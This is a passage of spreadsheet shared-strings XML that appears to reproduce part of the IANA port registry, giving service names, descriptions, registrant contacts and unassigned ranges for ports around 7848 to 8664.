    <t>7848-7868</t>
  </si>
  <si>
    <t>mobileanalyzer</t>
  </si>
  <si>
    <t>MobileAnalyzer&amp; MobileMonitor</t>
  </si>
  <si>
    <t>[Jonas_Gyllensvaan]</t>
  </si>
  <si>
    <t>rbt-smc</t>
  </si>
  <si>
    <t>Riverbed Steelhead Mobile Service</t>
  </si>
  <si>
    <t>[Gabriel_Levy]</t>
  </si>
  <si>
    <t>mdm</t>
  </si>
  <si>
    <t>Mobile Device Management</t>
  </si>
  <si>
    <t>[Dan_Harkins]</t>
  </si>
  <si>
    <t>mipv6tls</t>
  </si>
  <si>
    <t>TLS-based Mobile IPv6 Security</t>
  </si>
  <si>
    <t>[RFC6618]</t>
  </si>
  <si>
    <t>7873-7877</t>
  </si>
  <si>
    <t>owms</t>
  </si>
  <si>
    <t>Opswise Message Service</t>
  </si>
  <si>
    <t>[Stonebranch_Inc]</t>
  </si>
  <si>
    <t>[Nathan_Hammond_2]</t>
  </si>
  <si>
    <t>pss</t>
  </si>
  <si>
    <t>Pearson</t>
  </si>
  <si>
    <t>7881-7886</t>
  </si>
  <si>
    <t>ubroker</t>
  </si>
  <si>
    <t>Universal Broker</t>
  </si>
  <si>
    <t>[Nathan_Hammond]</t>
  </si>
  <si>
    <t>7888-7899</t>
  </si>
  <si>
    <t>mevent</t>
  </si>
  <si>
    <t>Multicast Event</t>
  </si>
  <si>
    <t>[YoonSoo_Kim]</t>
  </si>
  <si>
    <t>tnos-sp</t>
  </si>
  <si>
    <t>TNOS Service Protocol</t>
  </si>
  <si>
    <t>[Rene_Kurt]</t>
  </si>
  <si>
    <t>tnos-dp</t>
  </si>
  <si>
    <t>TNOS shell Protocol</t>
  </si>
  <si>
    <t>tnos-dps</t>
  </si>
  <si>
    <t>TNOS Secure DiaguardProtocol</t>
  </si>
  <si>
    <t>7904-7912</t>
  </si>
  <si>
    <t>qo-secure</t>
  </si>
  <si>
    <t>QuickObjects secure port</t>
  </si>
  <si>
    <t>[Jonas_Bovin]</t>
  </si>
  <si>
    <t>7914-7931</t>
  </si>
  <si>
    <t>t2-drm</t>
  </si>
  <si>
    <t>Tier 2 Data Resource Manager</t>
  </si>
  <si>
    <t>[Peter_Carlson]</t>
  </si>
  <si>
    <t>t2-brm</t>
  </si>
  <si>
    <t>Tier 2 Business Rules Manager</t>
  </si>
  <si>
    <t>7934-7961</t>
  </si>
  <si>
    <t>generalsync</t>
  </si>
  <si>
    <t>Encrypted, extendable, general-purpose synchronization protocol</t>
  </si>
  <si>
    <t>[Dirk_Steinmetz]</t>
  </si>
  <si>
    <t>7963-7966</t>
  </si>
  <si>
    <t>supercell</t>
  </si>
  <si>
    <t>Supercell</t>
  </si>
  <si>
    <t>[Kevin_Nakagawa]</t>
  </si>
  <si>
    <t>7968-7978</t>
  </si>
  <si>
    <t>micromuse-ncps</t>
  </si>
  <si>
    <t>Micromuse-ncps</t>
  </si>
  <si>
    <t>[Hing_Wing_To]</t>
  </si>
  <si>
    <t>quest-vista</t>
  </si>
  <si>
    <t>Quest Vista</t>
  </si>
  <si>
    <t>[Preston_Bannister]</t>
  </si>
  <si>
    <t>sossd-collect</t>
  </si>
  <si>
    <t>Spotlight on SQL Server Desktop Collect</t>
  </si>
  <si>
    <t>[Rob_Griffin_2]</t>
  </si>
  <si>
    <t>sossd-agent</t>
  </si>
  <si>
    <t>Spotlight on SQL Server Desktop Agent</t>
  </si>
  <si>
    <t>sossd-disc</t>
  </si>
  <si>
    <t>Spotlight on SQL Server Desktop Agent Discovery</t>
  </si>
  <si>
    <t>7983-7997</t>
  </si>
  <si>
    <t>pushns</t>
  </si>
  <si>
    <t>PUSH Notification Service</t>
  </si>
  <si>
    <t>[Tristan_Seifert]</t>
  </si>
  <si>
    <t>usicontentpush</t>
  </si>
  <si>
    <t>USI Content Push Service</t>
  </si>
  <si>
    <t>irdmi2</t>
  </si>
  <si>
    <t>iRDMI2</t>
  </si>
  <si>
    <t>irdmi</t>
  </si>
  <si>
    <t>iRDMI</t>
  </si>
  <si>
    <t>[Gil_Shafriri]</t>
  </si>
  <si>
    <t>vcom-tunnel</t>
  </si>
  <si>
    <t>VCOM Tunnel</t>
  </si>
  <si>
    <t>[Mark_Lewandowski]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 8001</t>
  </si>
  <si>
    <t>teradataordbms</t>
  </si>
  <si>
    <t>Teradata ORDBMS</t>
  </si>
  <si>
    <t>[Curt_Ellmann]</t>
  </si>
  <si>
    <t>mcreport</t>
  </si>
  <si>
    <t>Mulberry Connect Reporting Service</t>
  </si>
  <si>
    <t>[Dave_Stoneham]</t>
  </si>
  <si>
    <t>p2pevolvenet</t>
  </si>
  <si>
    <t>Opensource Evolv Enterprise Platform P2P Network Node Connection Protocol</t>
  </si>
  <si>
    <t>[Tris_Puki]</t>
  </si>
  <si>
    <t>[Adrians_Borsteins]</t>
  </si>
  <si>
    <t>mxi</t>
  </si>
  <si>
    <t>MXI Generation II for z/OS</t>
  </si>
  <si>
    <t>[Rob_Scott]</t>
  </si>
  <si>
    <t>wpl-analytics</t>
  </si>
  <si>
    <t>World Programming analytics</t>
  </si>
  <si>
    <t>[World_Programming_Limited]</t>
  </si>
  <si>
    <t>[Thomas_Quarendon]</t>
  </si>
  <si>
    <t>wpl-disc</t>
  </si>
  <si>
    <t>World Programming analytics discovery</t>
  </si>
  <si>
    <t>warppipe</t>
  </si>
  <si>
    <t>I/O oriented cluster computing software</t>
  </si>
  <si>
    <t>[MirrorWeb_LTD]</t>
  </si>
  <si>
    <t>[Jonathan_Kingsley]</t>
  </si>
  <si>
    <t>HTTP Alternate</t>
  </si>
  <si>
    <t>[James_Gettys]</t>
  </si>
  <si>
    <t>nvme-disc</t>
  </si>
  <si>
    <t>NVMe over Fabrics Discovery Service</t>
  </si>
  <si>
    <t>yes</t>
  </si>
  <si>
    <t>8011-8014</t>
  </si>
  <si>
    <t>cfg-cloud</t>
  </si>
  <si>
    <t>Configuration Cloud Service</t>
  </si>
  <si>
    <t>[admin_at_cfg_cloud]</t>
  </si>
  <si>
    <t>[Goksel_Darcan]</t>
  </si>
  <si>
    <t>ads-s</t>
  </si>
  <si>
    <t>Beckhoff Automation Device Specification</t>
  </si>
  <si>
    <t>[Beckhoff_Automation_GmbH_Co_KG]</t>
  </si>
  <si>
    <t>[Henning_Mersch_2]</t>
  </si>
  <si>
    <t>8017-8018</t>
  </si>
  <si>
    <t>qbdb</t>
  </si>
  <si>
    <t>QB DB Dynamic Port</t>
  </si>
  <si>
    <t>[Sridhar_Krishnamurth]</t>
  </si>
  <si>
    <t>intu-ec-svcdisc</t>
  </si>
  <si>
    <t>Intuit Entitlement Service and Discovery</t>
  </si>
  <si>
    <t>[Daniel_C_McGloin]</t>
  </si>
  <si>
    <t>intu-ec-client</t>
  </si>
  <si>
    <t>Intuit Entitlement Client</t>
  </si>
  <si>
    <t>oa-system</t>
  </si>
  <si>
    <t>arca-api</t>
  </si>
  <si>
    <t>ARCATrust vault API</t>
  </si>
  <si>
    <t>[ARCATrust_SA]</t>
  </si>
  <si>
    <t>[Yacince_Felk]</t>
  </si>
  <si>
    <t>ca-audit-da</t>
  </si>
  <si>
    <t>CA Audit Distribution Agent</t>
  </si>
  <si>
    <t>[Henning_Smith]</t>
  </si>
  <si>
    <t>ca-audit-ds</t>
  </si>
  <si>
    <t>CA Audit Distribution Server</t>
  </si>
  <si>
    <t>8027-8031</t>
  </si>
  <si>
    <t>pro-ed</t>
  </si>
  <si>
    <t>ProEd</t>
  </si>
  <si>
    <t>mindprint</t>
  </si>
  <si>
    <t>MindPrint</t>
  </si>
  <si>
    <t>[Larry_Tusoni]</t>
  </si>
  <si>
    <t>vantronix-mgmt</t>
  </si>
  <si>
    <t>.vantronix Management</t>
  </si>
  <si>
    <t>[Reyk_Floeter]</t>
  </si>
  <si>
    <t>8035-8039</t>
  </si>
  <si>
    <t>ampify</t>
  </si>
  <si>
    <t>Ampify Messaging Protocol</t>
  </si>
  <si>
    <t>[Tav_Espian]</t>
  </si>
  <si>
    <t>enguity-xccetp</t>
  </si>
  <si>
    <t>Xcorpeon ASIC Carrier Ethernet Transport</t>
  </si>
  <si>
    <t>[Enguity_Technology_Corp]</t>
  </si>
  <si>
    <t>[Kraig_Beahn_Jr]</t>
  </si>
  <si>
    <t>fs-agent</t>
  </si>
  <si>
    <t>FireScope Agent</t>
  </si>
  <si>
    <t>[Matt_Rogers]</t>
  </si>
  <si>
    <t>fs-server</t>
  </si>
  <si>
    <t>FireScope Server</t>
  </si>
  <si>
    <t>fs-mgmt</t>
  </si>
  <si>
    <t>FireScope Management Interface</t>
  </si>
  <si>
    <t>8045-8050</t>
  </si>
  <si>
    <t>rocrail</t>
  </si>
  <si>
    <t>Rocrail Client Service</t>
  </si>
  <si>
    <t>[Rob_Versluis]</t>
  </si>
  <si>
    <t>senomix01</t>
  </si>
  <si>
    <t>Senomix Timesheets Server</t>
  </si>
  <si>
    <t>[Charles_O_Dale]</t>
  </si>
  <si>
    <t>senomix02</t>
  </si>
  <si>
    <t>Senomix Timesheets Client [1 year assignment]</t>
  </si>
  <si>
    <t>senomix03</t>
  </si>
  <si>
    <t>Senomix Timesheets Server [1 year assignment]</t>
  </si>
  <si>
    <t>senomix04</t>
  </si>
  <si>
    <t>senomix05</t>
  </si>
  <si>
    <t>senomix06</t>
  </si>
  <si>
    <t>senomix07</t>
  </si>
  <si>
    <t>senomix08</t>
  </si>
  <si>
    <t>aero</t>
  </si>
  <si>
    <t>Asymmetric Extended Route Optimization (AERO)</t>
  </si>
  <si>
    <t>[RFC6706]</t>
  </si>
  <si>
    <t>8061-8065</t>
  </si>
  <si>
    <t>toad-bi-appsrvr</t>
  </si>
  <si>
    <t>Toad BI Application Server</t>
  </si>
  <si>
    <t>[Quest_Software_2]</t>
  </si>
  <si>
    <t>[Greg_Cottman_3]</t>
  </si>
  <si>
    <t>infi-async</t>
  </si>
  <si>
    <t>Infinidat async replication</t>
  </si>
  <si>
    <t>[INFINIDAT]</t>
  </si>
  <si>
    <t>[Eldar_Kleiner]</t>
  </si>
  <si>
    <t>8068-8069</t>
  </si>
  <si>
    <t>ucs-isc</t>
  </si>
  <si>
    <t>Oracle Unified Communication Suite's Indexed Search Converter</t>
  </si>
  <si>
    <t>[Oracle_Corp]</t>
  </si>
  <si>
    <t>[Bharathi_Sivaramakrishnan]</t>
  </si>
  <si>
    <t>8071-8073</t>
  </si>
  <si>
    <t>gadugadu</t>
  </si>
  <si>
    <t>Gadu-Gadu</t>
  </si>
  <si>
    <t>[Marcin_Gozdalik]</t>
  </si>
  <si>
    <t>8075-8076</t>
  </si>
  <si>
    <t>mles</t>
  </si>
  <si>
    <t>Mles is a client-server data distribution protocol 
      targeted to serve as a lightweight and reliable distributed 
      publish/subscribe database service.</t>
  </si>
  <si>
    <t>[Juhamatti_Kuusisaari]</t>
  </si>
  <si>
    <t>8078-8079</t>
  </si>
  <si>
    <t>HTTP Alternate (see port 80)</t>
  </si>
  <si>
    <t>[Stephen_Casner]</t>
  </si>
  <si>
    <t>sunproxyadmin</t>
  </si>
  <si>
    <t>Sun Proxy Admin Service</t>
  </si>
  <si>
    <t>[Arvind_Srinivasan]</t>
  </si>
  <si>
    <t>us-cli</t>
  </si>
  <si>
    <t>Utilistor (Client)</t>
  </si>
  <si>
    <t>[Andy_Brewerton]</t>
  </si>
  <si>
    <t>us-srv</t>
  </si>
  <si>
    <t>Utilistor (Server)</t>
  </si>
  <si>
    <t>websnp</t>
  </si>
  <si>
    <t>Snarl Network Protocol over HTTP</t>
  </si>
  <si>
    <t>[full_phat_products]</t>
  </si>
  <si>
    <t>d-s-n</t>
  </si>
  <si>
    <t>Distributed SCADA Networking Rendezvous Port</t>
  </si>
  <si>
    <t>[Gary_Hampton]</t>
  </si>
  <si>
    <t>simplifymedia</t>
  </si>
  <si>
    <t>Simplify Media SPP Protocol</t>
  </si>
  <si>
    <t>[Emmanuel_Saint_Loube]</t>
  </si>
  <si>
    <t>radan-http</t>
  </si>
  <si>
    <t>Radan HTTP</t>
  </si>
  <si>
    <t>[Steve_Hay]</t>
  </si>
  <si>
    <t>opsmessaging</t>
  </si>
  <si>
    <t>Vehicle to station messaging</t>
  </si>
  <si>
    <t>[LAN-ACES_Inc]</t>
  </si>
  <si>
    <t>jamlink</t>
  </si>
  <si>
    <t>Jam Link Framework</t>
  </si>
  <si>
    <t>[Evgeniy_Filatov]</t>
  </si>
  <si>
    <t>8092-8096</t>
  </si>
  <si>
    <t>sac</t>
  </si>
  <si>
    <t>SAC Port Id</t>
  </si>
  <si>
    <t>[Girish_Bhat]</t>
  </si>
  <si>
    <t>8098-8099</t>
  </si>
  <si>
    <t>xprint-server</t>
  </si>
  <si>
    <t>Xprint Server</t>
  </si>
  <si>
    <t>[John_McKernan]</t>
  </si>
  <si>
    <t>ldoms-migr</t>
  </si>
  <si>
    <t>Logical Domains Migration</t>
  </si>
  <si>
    <t>[Liam_Merwick]</t>
  </si>
  <si>
    <t>kz-migr</t>
  </si>
  <si>
    <t>Oracle Kernel zones migration server</t>
  </si>
  <si>
    <t>[Oracle_4]</t>
  </si>
  <si>
    <t>[John_Levon]</t>
  </si>
  <si>
    <t>8103-8110</t>
  </si>
  <si>
    <t>skynetflow</t>
  </si>
  <si>
    <t>Skynetflow network services</t>
  </si>
  <si>
    <t>[skynetflow.com]</t>
  </si>
  <si>
    <t>[Dmitrii_Ogarkov]</t>
  </si>
  <si>
    <t>8112-8114</t>
  </si>
  <si>
    <t>mtl8000-matrix</t>
  </si>
  <si>
    <t>MTL8000 Matrix</t>
  </si>
  <si>
    <t>[David_Pinch]</t>
  </si>
  <si>
    <t>cp-cluster</t>
  </si>
  <si>
    <t>Check Point Clustering</t>
  </si>
  <si>
    <t>[Roni_Moshitzky]</t>
  </si>
  <si>
    <t>purityrpc</t>
  </si>
  <si>
    <t>Purity replication clustering and remote management</t>
  </si>
  <si>
    <t>[Pure_Storage]</t>
  </si>
  <si>
    <t>[Steve_Hodgson]</t>
  </si>
  <si>
    <t>privoxy</t>
  </si>
  <si>
    <t>Privoxy HTTP proxy</t>
  </si>
  <si>
    <t>[Andreas_Oesterhelt]</t>
  </si>
  <si>
    <t>8119-8120</t>
  </si>
  <si>
    <t>apollo-data</t>
  </si>
  <si>
    <t>Apollo Data Port</t>
  </si>
  <si>
    <t>[Anthony_Carrabino]</t>
  </si>
  <si>
    <t>apollo-admin</t>
  </si>
  <si>
    <t>Apollo Admin Port</t>
  </si>
  <si>
    <t>8123-8127</t>
  </si>
  <si>
    <t>paycash-online</t>
  </si>
  <si>
    <t>PayCash Online Protocol</t>
  </si>
  <si>
    <t>[MegaZone]</t>
  </si>
  <si>
    <t>paycash-wbp</t>
  </si>
  <si>
    <t>PayCash Wallet-Browser</t>
  </si>
  <si>
    <t>indigo-vrmi</t>
  </si>
  <si>
    <t>INDIGO-VRMI</t>
  </si>
  <si>
    <t>[Colin_Caughie]</t>
  </si>
  <si>
    <t>indigo-vbcp</t>
  </si>
  <si>
    <t>INDIGO-VBCP</t>
  </si>
  <si>
    <t>dbabble</t>
  </si>
  <si>
    <t>[Chris_Pugmire]</t>
  </si>
  <si>
    <t>8133-8139</t>
  </si>
  <si>
    <t>puppet</t>
  </si>
  <si>
    <t>The Puppet master service</t>
  </si>
  <si>
    <t>[Puppet]</t>
  </si>
  <si>
    <t>[Charles_Dunbar]</t>
  </si>
  <si>
    <t>8141-8147</t>
  </si>
  <si>
    <t>isdd</t>
  </si>
  <si>
    <t>i-SDD file transfer</t>
  </si>
  <si>
    <t>[Frank_Waarsenburg]</t>
  </si>
  <si>
    <t>eor-game</t>
  </si>
  <si>
    <t>Edge of Reality game data</t>
  </si>
  <si>
    <t>[Sky_Schulz]</t>
  </si>
  <si>
    <t>8150-8152</t>
  </si>
  <si>
    <t>quantastor</t>
  </si>
  <si>
    <t>QuantaStor Management Interface</t>
  </si>
  <si>
    <t>[OS_NEXUS]</t>
  </si>
  <si>
    <t>[Steven_Umbehocker]</t>
  </si>
  <si>
    <t>8154-8159</t>
  </si>
  <si>
    <t>patrol</t>
  </si>
  <si>
    <t>Patrol</t>
  </si>
  <si>
    <t>patrol-snmp</t>
  </si>
  <si>
    <t>Patrol SNMP</t>
  </si>
  <si>
    <t>lpar2rrd</t>
  </si>
  <si>
    <t>LPAR2RRD client server communication</t>
  </si>
  <si>
    <t>[LPAR2RRD_project]</t>
  </si>
  <si>
    <t>[Pavel_Hampl]</t>
  </si>
  <si>
    <t>8163-8180</t>
  </si>
  <si>
    <t>intermapper</t>
  </si>
  <si>
    <t>Intermapper network management system</t>
  </si>
  <si>
    <t>[William_Fisher]</t>
  </si>
  <si>
    <t>vmware-fdm</t>
  </si>
  <si>
    <t>VMware Fault Domain Manager</t>
  </si>
  <si>
    <t>[Ron_Passerini]</t>
  </si>
  <si>
    <t>proremote</t>
  </si>
  <si>
    <t>ProRemote</t>
  </si>
  <si>
    <t>[Alex_Lelievre]</t>
  </si>
  <si>
    <t>itach</t>
  </si>
  <si>
    <t>Remote iTach Connection</t>
  </si>
  <si>
    <t>[Barend_Jacobus_van_d]</t>
  </si>
  <si>
    <t>8185-8189</t>
  </si>
  <si>
    <t>gcp-rphy</t>
  </si>
  <si>
    <t>Generic control plane for RPHY</t>
  </si>
  <si>
    <t>[CableLabs]</t>
  </si>
  <si>
    <t>[Karthik_Sundaresan]</t>
  </si>
  <si>
    <t>limnerpressure</t>
  </si>
  <si>
    <t>Limner Pressure</t>
  </si>
  <si>
    <t>[Aaron_Kleinsteiber]</t>
  </si>
  <si>
    <t>spytechphone</t>
  </si>
  <si>
    <t>SpyTech Phone Service</t>
  </si>
  <si>
    <t>[Bill_Kay]</t>
  </si>
  <si>
    <t>blp1</t>
  </si>
  <si>
    <t>Bloomberg data API</t>
  </si>
  <si>
    <t>[Albert_Hou]</t>
  </si>
  <si>
    <t>blp2</t>
  </si>
  <si>
    <t>Bloomberg feed</t>
  </si>
  <si>
    <t>8196-8198</t>
  </si>
  <si>
    <t>vvr-data</t>
  </si>
  <si>
    <t>VVR DATA</t>
  </si>
  <si>
    <t>trivnet1</t>
  </si>
  <si>
    <t>TRIVNET</t>
  </si>
  <si>
    <t>[Saar_Wilf]</t>
  </si>
  <si>
    <t>trivnet2</t>
  </si>
  <si>
    <t>aesop</t>
  </si>
  <si>
    <t>Audio+Ethernet Standard Open Protocol</t>
  </si>
  <si>
    <t>[POWERSOFT_SRL]</t>
  </si>
  <si>
    <t>[Paolo_Desii][Claudio_Lastrucci]</t>
  </si>
  <si>
    <t>8203-8203</t>
  </si>
  <si>
    <t>lm-perfworks</t>
  </si>
  <si>
    <t>LM Perfworks</t>
  </si>
  <si>
    <t>[Chris_Flynn]</t>
  </si>
  <si>
    <t>lm-instmgr</t>
  </si>
  <si>
    <t>LM Instmgr</t>
  </si>
  <si>
    <t>lm-dta</t>
  </si>
  <si>
    <t>LM Dta</t>
  </si>
  <si>
    <t>lm-sserver</t>
  </si>
  <si>
    <t>LM SServer</t>
  </si>
  <si>
    <t>lm-webwatcher</t>
  </si>
  <si>
    <t>LM Webwatcher</t>
  </si>
  <si>
    <t>8209-8210</t>
  </si>
  <si>
    <t>aruba-papi</t>
  </si>
  <si>
    <t>Aruba Networks AP management</t>
  </si>
  <si>
    <t>[Aruba_Networks]</t>
  </si>
  <si>
    <t>[Jon_Green]</t>
  </si>
  <si>
    <t>8212-8229</t>
  </si>
  <si>
    <t>rexecj</t>
  </si>
  <si>
    <t>RexecJ Server</t>
  </si>
  <si>
    <t>[Curtiss_Howard]</t>
  </si>
  <si>
    <t>hncp-udp-port</t>
  </si>
  <si>
    <t>HNCP</t>
  </si>
  <si>
    <t>[RFC7788]</t>
  </si>
  <si>
    <t>hncp-dtls-port</t>
  </si>
  <si>
    <t>HNCP over DTLS</t>
  </si>
  <si>
    <t>8233-8242</t>
  </si>
  <si>
    <t>synapse-nhttps</t>
  </si>
  <si>
    <t>Synapse Non Blocking HTTPS</t>
  </si>
  <si>
    <t>[Ruwan_Linton]</t>
  </si>
  <si>
    <t>8244-8265</t>
  </si>
  <si>
    <t>espeasy-p2p</t>
  </si>
  <si>
    <t>ESPeasy peer-2-peer communication</t>
  </si>
  <si>
    <t>[ESPeasy]</t>
  </si>
  <si>
    <t>[Gijs_Noorlander]</t>
  </si>
  <si>
    <t>8267-8269</t>
  </si>
  <si>
    <t>robot-remote</t>
  </si>
  <si>
    <t>Robot Framework Remote Library Interface</t>
  </si>
  <si>
    <t>[Robot_Framework_Foundation]</t>
  </si>
  <si>
    <t>8271-8275</t>
  </si>
  <si>
    <t>pando-sec</t>
  </si>
  <si>
    <t>Pando Media Controlled Distribution</t>
  </si>
  <si>
    <t>8277-8279</t>
  </si>
  <si>
    <t>synapse-nhttp</t>
  </si>
  <si>
    <t>Synapse Non Blocking HTTP</t>
  </si>
  <si>
    <t>libelle</t>
  </si>
  <si>
    <t>Libelle EnterpriseBus</t>
  </si>
  <si>
    <t>[Libelle_AG]</t>
  </si>
  <si>
    <t>[Hans-Joachim_Krueger]</t>
  </si>
  <si>
    <t>libelle-disc</t>
  </si>
  <si>
    <t>Libelle EnterpriseBus discovery</t>
  </si>
  <si>
    <t>8283-8291</t>
  </si>
  <si>
    <t>blp3</t>
  </si>
  <si>
    <t>Bloomberg professional</t>
  </si>
  <si>
    <t>hiperscan-id</t>
  </si>
  <si>
    <t>Hiperscan Identification Service</t>
  </si>
  <si>
    <t>[Thomas_Klose]</t>
  </si>
  <si>
    <t>blp4</t>
  </si>
  <si>
    <t>Bloomberg intelligent client</t>
  </si>
  <si>
    <t>8295-8299</t>
  </si>
  <si>
    <t>tmi</t>
  </si>
  <si>
    <t>Transport Management Interface</t>
  </si>
  <si>
    <t>[Steve_Kneizys]</t>
  </si>
  <si>
    <t>amberon</t>
  </si>
  <si>
    <t>Amberon PPC/PPS</t>
  </si>
  <si>
    <t>[Ronald_Snyder]</t>
  </si>
  <si>
    <t>8302-8312</t>
  </si>
  <si>
    <t>hub-open-net</t>
  </si>
  <si>
    <t>Hub Open Network</t>
  </si>
  <si>
    <t>[Grexie]</t>
  </si>
  <si>
    <t>[Tim_Behrsin]</t>
  </si>
  <si>
    <t>Defined TXT keys: _hub._tcp.host.example.com</t>
  </si>
  <si>
    <t>8314-8319</t>
  </si>
  <si>
    <t>tnp-discover</t>
  </si>
  <si>
    <t>Thin(ium) Network Protocol</t>
  </si>
  <si>
    <t>[Aly_Orady]</t>
  </si>
  <si>
    <t>tnp</t>
  </si>
  <si>
    <t>garmin-marine</t>
  </si>
  <si>
    <t>Garmin Marine</t>
  </si>
  <si>
    <t>[Garmin_International_Inc]</t>
  </si>
  <si>
    <t>[Nathan_Karstens]</t>
  </si>
  <si>
    <t>8323-8350</t>
  </si>
  <si>
    <t>server-find</t>
  </si>
  <si>
    <t>Server Find</t>
  </si>
  <si>
    <t>[Chris_Brown]</t>
  </si>
  <si>
    <t>8352-8375</t>
  </si>
  <si>
    <t>cruise-enum</t>
  </si>
  <si>
    <t>Cruise ENUM</t>
  </si>
  <si>
    <t>[Steve_Husak]</t>
  </si>
  <si>
    <t>cruise-swroute</t>
  </si>
  <si>
    <t>Cruise SWROUTE</t>
  </si>
  <si>
    <t>cruise-config</t>
  </si>
  <si>
    <t>Cruise CONFIG</t>
  </si>
  <si>
    <t>cruise-diags</t>
  </si>
  <si>
    <t>Cruise DIAGS</t>
  </si>
  <si>
    <t>cruise-update</t>
  </si>
  <si>
    <t>Cruise UPDATE</t>
  </si>
  <si>
    <t>8381-8382</t>
  </si>
  <si>
    <t>m2mservices</t>
  </si>
  <si>
    <t>M2m Services</t>
  </si>
  <si>
    <t>[Carlos_Arteaga_2]</t>
  </si>
  <si>
    <t>marathontp</t>
  </si>
  <si>
    <t>Marathon Transport Protocol</t>
  </si>
  <si>
    <t>[Inertia_Systemes]</t>
  </si>
  <si>
    <t>[Jasmin_Blouin]</t>
  </si>
  <si>
    <t>8385-8399</t>
  </si>
  <si>
    <t>cvd</t>
  </si>
  <si>
    <t>[Aaron_Bilbrey]</t>
  </si>
  <si>
    <t>sabarsd</t>
  </si>
  <si>
    <t>abarsd</t>
  </si>
  <si>
    <t>svcloud</t>
  </si>
  <si>
    <t>SuperVault Cloud</t>
  </si>
  <si>
    <t>[Nine_Technology_LLC]</t>
  </si>
  <si>
    <t>[Alex_Stoev]</t>
  </si>
  <si>
    <t>svbackup</t>
  </si>
  <si>
    <t>SuperVault Backup</t>
  </si>
  <si>
    <t>8406-8414</t>
  </si>
  <si>
    <t>dlpx-sp</t>
  </si>
  <si>
    <t>Delphix Session Protocol</t>
  </si>
  <si>
    <t>[Delphix_Corp]</t>
  </si>
  <si>
    <t>[Peng_Dai]</t>
  </si>
  <si>
    <t>espeech</t>
  </si>
  <si>
    <t>eSpeech Session Protocol</t>
  </si>
  <si>
    <t>[Scott_Tarone]</t>
  </si>
  <si>
    <t>espeech-rtp</t>
  </si>
  <si>
    <t>eSpeech RTP Protocol</t>
  </si>
  <si>
    <t>8418-8422</t>
  </si>
  <si>
    <t>aritts</t>
  </si>
  <si>
    <t>Aristech text-to-speech server</t>
  </si>
  <si>
    <t>[Aristech_GmbH]</t>
  </si>
  <si>
    <t>[Mirko_Hering]</t>
  </si>
  <si>
    <t>8424-8441</t>
  </si>
  <si>
    <t>cybro-a-bus</t>
  </si>
  <si>
    <t>CyBro A-bus Protocol</t>
  </si>
  <si>
    <t>[Damir_Skrjanec]</t>
  </si>
  <si>
    <t>pcsync-https</t>
  </si>
  <si>
    <t>PCsync HTTPS</t>
  </si>
  <si>
    <t>pcsync-http</t>
  </si>
  <si>
    <t>PCsync HTTP</t>
  </si>
  <si>
    <t>copy</t>
  </si>
  <si>
    <t>Port for copy peer sync feature</t>
  </si>
  <si>
    <t>[Copy]</t>
  </si>
  <si>
    <t>[Jason_Dictos]</t>
  </si>
  <si>
    <t>copy-disc</t>
  </si>
  <si>
    <t>Port for copy discovery</t>
  </si>
  <si>
    <t>8446-8449</t>
  </si>
  <si>
    <t>npmp</t>
  </si>
  <si>
    <t>[Ian_Chard]</t>
  </si>
  <si>
    <t>8451-8456</t>
  </si>
  <si>
    <t>nexentamv</t>
  </si>
  <si>
    <t>Nexenta Management GUI</t>
  </si>
  <si>
    <t>[Nexenta]</t>
  </si>
  <si>
    <t>[Andrew_Galloway]</t>
  </si>
  <si>
    <t>8458-8469</t>
  </si>
  <si>
    <t>cisco-avp</t>
  </si>
  <si>
    <t>Cisco Address Validation Protocol</t>
  </si>
  <si>
    <t>pim-port</t>
  </si>
  <si>
    <t>PIM over Reliable Transport</t>
  </si>
  <si>
    <t>[RFC6559]</t>
  </si>
  <si>
    <t>otv</t>
  </si>
  <si>
    <t>Overlay Transport Virtualization (OTV)</t>
  </si>
  <si>
    <t>vp2p</t>
  </si>
  <si>
    <t>Virtual Point to Point</t>
  </si>
  <si>
    <t>[Jerome_Grimbert]</t>
  </si>
  <si>
    <t>noteshare</t>
  </si>
  <si>
    <t>AquaMinds NoteShare</t>
  </si>
  <si>
    <t>[Michael_McNabb]</t>
  </si>
  <si>
    <t>8475-8499</t>
  </si>
  <si>
    <t>fmtp</t>
  </si>
  <si>
    <t>Flight Message Transfer Protocol</t>
  </si>
  <si>
    <t>cmtp-mgt</t>
  </si>
  <si>
    <t>CYTEL Message Transfer Management</t>
  </si>
  <si>
    <t>cmtp-av</t>
  </si>
  <si>
    <t>CYTEL Message Transfer Audio and Video</t>
  </si>
  <si>
    <t>[Frank_Jakel]</t>
  </si>
  <si>
    <t>ftnmtp</t>
  </si>
  <si>
    <t>FTN Message Transfer Protocol</t>
  </si>
  <si>
    <t>[Yuri_Myakotin]</t>
  </si>
  <si>
    <t>lsp-self-ping</t>
  </si>
  <si>
    <t>MPLS LSP Self-Ping</t>
  </si>
  <si>
    <t>[RFC7746]</t>
  </si>
  <si>
    <t>8504-8553</t>
  </si>
  <si>
    <t>rtsp-alt</t>
  </si>
  <si>
    <t>RTSP Alternate (see port 554)</t>
  </si>
  <si>
    <t>[Stephen_Casner_2]</t>
  </si>
  <si>
    <t>d-fence</t>
  </si>
  <si>
    <t>SYMAX D-FENCE</t>
  </si>
  <si>
    <t>[Thomas_Geisel]</t>
  </si>
  <si>
    <t>8556-8566</t>
  </si>
  <si>
    <t>dof-tunnel</t>
  </si>
  <si>
    <t>DOF Tunneling Protocol</t>
  </si>
  <si>
    <t>8568-8599</t>
  </si>
  <si>
    <t>asterix</t>
  </si>
  <si>
    <t>Surveillance Data</t>
  </si>
  <si>
    <t>8601-8608</t>
  </si>
  <si>
    <t>canon-cpp-disc</t>
  </si>
  <si>
    <t>Canon Compact Printer Protocol Discovery</t>
  </si>
  <si>
    <t>[Canon_Inc]</t>
  </si>
  <si>
    <t>[Ryusuke_Okuhara]</t>
  </si>
  <si>
    <t>canon-mfnp</t>
  </si>
  <si>
    <t>Canon MFNP Service</t>
  </si>
  <si>
    <t>[Ritsuto_Sako]</t>
  </si>
  <si>
    <t>canon-bjnp1</t>
  </si>
  <si>
    <t>Canon BJNP Port 1</t>
  </si>
  <si>
    <t>[Atsushi_Nakamura]</t>
  </si>
  <si>
    <t>canon-bjnp2</t>
  </si>
  <si>
    <t>Canon BJNP Port 2</t>
  </si>
  <si>
    <t>canon-bjnp3</t>
  </si>
  <si>
    <t>Canon BJNP Port 3</t>
  </si>
  <si>
    <t>canon-bjnp4</t>
  </si>
  <si>
    <t>Canon BJNP Port 4</t>
  </si>
  <si>
    <t>imink</t>
  </si>
  <si>
    <t>Imink Service Control</t>
  </si>
  <si>
    <t>[KEN_ICHI_FUJII]</t>
  </si>
  <si>
    <t>8616-8664</t>
  </si>
